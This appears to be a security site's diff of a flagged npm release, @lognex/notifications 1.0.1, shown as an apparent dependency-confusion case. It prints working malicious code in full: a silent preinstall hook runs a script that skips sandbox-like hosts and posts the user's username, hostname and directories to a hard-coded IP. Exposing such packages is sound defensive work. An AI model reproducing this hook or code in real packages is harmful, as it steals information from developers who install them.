@lognex/notifications 0.0.1-security → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @lognex/notifications might be problematic. Click here for more details.
- package/index.js +44 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,44 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const path = require('path');
|
3
|
+
const http = require('http');
|
4
|
+
|
5
|
+
const hostname = os.hostname();
|
6
|
+
if (hostname.length === 14 || hostname === 'instance' || hostname === 'centos') {
|
7
|
+
return;
|
8
|
+
}
|
9
|
+
|
10
|
+
const data = JSON.stringify({
|
11
|
+
currentDirectory: process.cwd(),
|
12
|
+
scriptDirectory: path.dirname(__filename),
|
13
|
+
username: os.userInfo().username,
|
14
|
+
hostname: hostname
|
15
|
+
});
|
16
|
+
|
17
|
+
|
18
|
+
const options = {
|
19
|
+
hostname: '185.62.58.88',
|
20
|
+
port: 8000,
|
21
|
+
path: '/',
|
22
|
+
method: 'POST',
|
23
|
+
headers: {
|
24
|
+
'Content-Type': 'application/json',
|
25
|
+
'Content-Length': data.length
|
26
|
+
}
|
27
|
+
};
|
28
|
+
|
29
|
+
|
30
|
+
const req = http.request(options, (res) => {
|
31
|
+
|
32
|
+
res.on('data', (d) => {
|
33
|
+
process.stdout.write(d);
|
34
|
+
});
|
35
|
+
});
|
36
|
+
|
37
|
+
|
38
|
+
req.on('error', (error) => {
|
39
|
+
//console.error(error);
|
40
|
+
});
|
41
|
+
|
42
|
+
|
43
|
+
req.write(data);
|
44
|
+
req.end();
|
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "@lognex/notifications",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "",
|
5
|
+
"main": "main.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js > /dev/null 2>&1",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "lexi2",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"@lognex/services-event": "^1.0.0",
|
14
|
+
"lodash": "^4.17.21"
|
15
|
+
}
|
6
16
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40lognex%2Fnotifications for more information.
|